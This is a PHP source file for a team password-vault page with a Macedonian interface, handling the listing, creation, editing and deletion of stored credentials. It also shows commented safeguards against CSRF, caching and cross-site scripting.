Edit File: vault.php
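<?php
/**
 * Vault page: lists, creates, updates and deletes the team's stored credential records.
 *
 * Everything not defined in this file (ivsoft_session_boot(), vault_read(), vault_write(),
 * uuid4(), safe(), PORTAL_NAME) is expected to come from the two includes below; their
 * behaviour is not visible from here.
 */
require __DIR__ . '/includes/config.php';
require __DIR__ . '/includes/crypto.php';

ivsoft_session_boot();
session_start();

// Access check: only an authenticated portal session may reach the vault.
if (empty($_SESSION['ivsoft_portal_auth'])) {
    header('Location: index.php');
    exit;
}

// Every stored password is written into this page's markup (the `hidden` attribute only
// hides it visually), so the response must not be kept by browser or proxy caches.
header('Cache-Control: no-store');

// CSRF token for the forms, created once per session.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(16));
}
$CSRF = $_SESSION['csrf_token'];

/**
 * Shorthand for safe(), used for every value echoed into HTML.
 *
 * NOTE(review): the attribute values below rely on safe() escaping both quote
 * characters (htmlspecialchars with ENT_QUOTES or equivalent) — confirm in the includes.
 */
function s($x)
{
    return safe($x);
}

// Reads one POST field as a string. An array-valued field (e.g. "id[]=x") becomes ''
// so that trim() and hash_equals() never receive a non-string and throw a TypeError.
$postString = static function (string $key): string {
    $value = $_POST[$key] ?? '';
    return is_string($value) ? $value : '';
};

// True only for absolute http(s) URLs. Stored URLs with any other scheme
// (javascript:, data:, ...) are shown as text instead of being put into an href.
$isWebUrl = static function (string $url): bool {
    return preg_match('#^https?://#i', $url) === 1;
};

// Flags that make json_encode() output safe inside a single-quoted HTML event attribute:
// quotes, ampersands and angle brackets are emitted as \uXXXX escapes.
$jsFlags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_AMP | JSON_HEX_QUOT;

$items = vault_read();

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Constant-time comparison of the submitted token against the session token.
    if (!hash_equals($_SESSION['csrf_token'], $postString('csrf'))) {
        http_response_code(400);
        exit('CSRF');
    }

    $action = $postString('action');

    if ($action === 'create' || $action === 'update') {
        $id = trim($postString('id'));
        $item = [
            'id'       => $id ?: uuid4(),
            'title'    => trim($postString('title')),
            'url'      => trim($postString('url')),
            'username' => trim($postString('username')),
            // Passwords are stored exactly as typed; surrounding whitespace may be significant.
            'password' => $postString('password'),
            'notes'    => trim($postString('notes')),
            'tags'     => array_values(array_filter(array_map('trim', explode(',', $postString('tags'))))),
            'updated'  => date('c'),
        ];
        if ($item['title'] === '') {
            $item['title'] = '(Untitled)';
        }

        // Replace the record with the same id, or append when none matches.
        $found = false;
        foreach ($items as &$it) {
            if ($it['id'] === $item['id']) {
                $it = $item;
                $found = true;
                break;
            }
        }
        unset($it); // drop the by-reference binding so later use of $it cannot overwrite a record

        if (!$found) {
            $items[] = $item;
        }

        usort($items, fn($a, $b) => strcasecmp($a['title'], $b['title']));
        vault_write($items);
        header('Location: vault.php');
        exit;
    }

    if ($action === 'delete') {
        $id = trim($postString('id'));
        $items = array_values(array_filter($items, fn($it) => $it['id'] !== $id));
        vault_write($items);
        header('Location: vault.php');
        exit;
    }
}
?><!doctype html>
<html lang="mk">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title><?= s(PORTAL_NAME) ?> — Vault</title>
  <link rel="stylesheet" href="assets/styles.css">
</head>
<body class="gradient-bg">
  <header class="topbar">
    <div class="brand">🔐 <?= s(PORTAL_NAME) ?></div>
    <nav class="topnav">
      <a class="toplink" href="logout.php" title="Одјава">Одјава</a>
    </nav>
  </header>

  <main class="container">
    <h2 class="page-title">Passwords & Links</h2>
    <p class="muted">Безбедно складиште за тимот. Пребарај/уреди/бриши записи.</p>

    <div class="toolbar">
      <div class="search">
        <input id="q" type="search" placeholder="Пребарај по наслов, url, корисничко, таг..." oninput="filterCards()">
      </div>
      <button class="btn-primary" onclick="openModal()">+ Нов запис</button>
    </div>

    <section id="vaultGrid" class="vault-grid">
      <?php foreach ($items as $it): ?>
        <article class="vault-card"
          data-title="<?= s(strtolower($it['title'])) ?>"
          data-url="<?= s(strtolower($it['url'])) ?>"
          data-user="<?= s(strtolower($it['username'])) ?>"
          data-tags="<?= s(strtolower(implode(',', $it['tags'] ?? []))) ?>">
          <h3 class="v-title"><?= s($it['title']) ?></h3>

          <?php if (!empty($it['url'])): ?>
            <div class="v-url">
              <?php if ($isWebUrl((string)$it['url'])): ?>
                <?php /* noreferrer keeps the vault's own address out of the Referer header sent to the target site. */ ?>
                <a href="<?= s($it['url']) ?>" target="_blank" rel="noopener noreferrer"><?= s($it['url']) ?></a>
              <?php else: ?>
                <span><?= s($it['url']) ?></span>
              <?php endif; ?>
            </div>
          <?php endif; ?>

          <div class="v-meta">
            <div class="v-field">
              <span>👤 <code><?= s($it['username']) ?></code></span>
              <?php /* The value is a JavaScript string literal here, so it is JSON-encoded with the
                       HEX flags. HTML escaping alone is undone by the HTML parser before the
                       handler is compiled, which would let a quote in a stored username end the
                       string early. */ ?>
              <button class="btn-sec" onclick='copyText(<?= json_encode((string)$it['username'], $jsFlags) ?>)'>Copy</button>
            </div>
            <div class="v-field">
              <span>🔒 <code data-pw hidden><?= s($it['password']) ?></code><em data-mask>••••••••</em></span>
              <div>
                <button class="btn-sec" onclick="togglePw(this)">Show</button>
                <button class="btn-sec" onclick="copyPw(this)">Copy</button>
              </div>
            </div>
          </div>

          <?php if (!empty($it['notes'])): ?>
            <div style="margin-top:10px; color:#cbd5e1; white-space:pre-wrap"><?= s($it['notes']) ?></div>
          <?php endif; ?>

          <div class="taglist">
            <?php foreach ($it['tags'] ?? [] as $tg): ?>
              <span class="tag">#<?= s($tg) ?></span>
            <?php endforeach; ?>
          </div>

          <div class="v-actions">
            <button class="btn-sec" onclick='editItem(<?= json_encode($it, $jsFlags) ?>)'>✏️ Уреди</button>
            <?php /* Single quotes inside the handler: a double quote would close the onsubmit attribute. */ ?>
            <form method="post" onsubmit="return confirm('Да го избришам записот?')">
              <input type="hidden" name="csrf" value="<?= s($CSRF) ?>">
              <input type="hidden" name="action" value="delete">
              <input type="hidden" name="id" value="<?= s($it['id']) ?>">
              <button class="btn-sec danger" type="submit">🗑️ Бриши</button>
            </form>
          </div>

          <div class="muted" style="margin-top:6px;font-size:12px">Последно: <?= s(date('Y-m-d H:i', strtotime($it['updated'] ?? 'now'))) ?></div>
        </article>
      <?php endforeach; ?>

      <?php if (empty($items)): ?>
        <div class="vault-card">
          <p class="muted">Нема записи. Кликни „Нов запис“ за да додадеш.</p>
        </div>
      <?php endif; ?>
    </section>
  </main>

  <!-- Modal -->
  <dialog id="vModal" class="v-modal">
    <form method="post" id="vForm">
      <div class="m-head">
        <strong id="mTitle">Нов запис</strong>
        <button type="button" class="toplink" onclick="closeModal()">✖</button>
      </div>
      <div class="m-body">
        <input type="hidden" name="csrf" value="<?= s($CSRF) ?>">
        <input type="hidden" name="action" value="create" id="mAction">
        <input type="hidden" name="id" id="mId">
        <div class="grid-2">
          <div>
            <label class="label">Наслов</label>
            <input class="input" name="title" id="mTitleInput" placeholder="Пр. MailWizz Admin" required>
          </div>
          <div>
            <label class="label">URL</label>
            <input class="input" name="url" id="mUrl" placeholder="https://...">
          </div>
          <div>
            <label class="label">Корисничко</label>
            <input class="input" name="username" id="mUser" placeholder="user@example.com">
          </div>
          <div>
            <label class="label">Лозинка</label>
            <input class="input" name="password" id="mPass" placeholder="••••••••">
          </div>
        </div>
        <div style="margin-top:12px">
          <label class="label">Тагови (оддели со запирка)</label>
          <input class="input" name="tags" id="mTags" placeholder="email, prod, admin">
        </div>
        <div style="margin-top:12px">
          <label class="label">Забелешки</label>
          <textarea class="input" name="notes" id="mNotes" rows="4" placeholder="Коментари, инструкции..."></textarea>
        </div>
      </div>
      <div class="m-actions">
        <button type="button" class="btn-sec" onclick="closeModal()">Откажи</button>
        <button class="btn-primary" type="submit" id="mSubmit">Зачувај</button>
      </div>
    </form>
  </dialog>

  <script src="assets/app.js"></script>
</body>
</html>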